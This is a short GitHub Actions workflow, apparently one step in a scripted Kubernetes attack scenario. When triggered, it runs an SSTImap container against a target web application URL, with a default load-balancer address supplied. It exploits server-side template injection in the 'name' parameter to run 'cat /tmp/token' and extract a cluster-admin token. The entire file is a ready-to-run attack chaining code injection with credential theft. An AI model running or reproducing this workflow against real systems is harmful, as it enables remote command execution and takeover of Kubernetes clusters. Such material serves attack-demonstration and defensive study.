name: 2_Steal_ClusterAdmin_Token

on:
  # push:
  #  branches:
  #    - main
  workflow_dispatch:
    inputs:
      APP_URL:
        description: 'URL of the web application to attack'
        required: true
        default: 'http://a568eccbd07e744ea98e9d7c9cd4a597-607046943.eu-west-3.elb.amazonaws.com/'


jobs:
    token-job:
        runs-on: ubuntu-latest
          
        steps:
            - name: Checkout repository
              uses: actions/checkout@v3

            - name: Steal ClusterAdmin Token
              run: |
                docker run chrisley75/sstimap:1.0.3 \
                  -u "${{ github.event.inputs.APP_URL }}page?name=attack" \
                  --os-cmd "cat /tmp/token | cut -c 3-"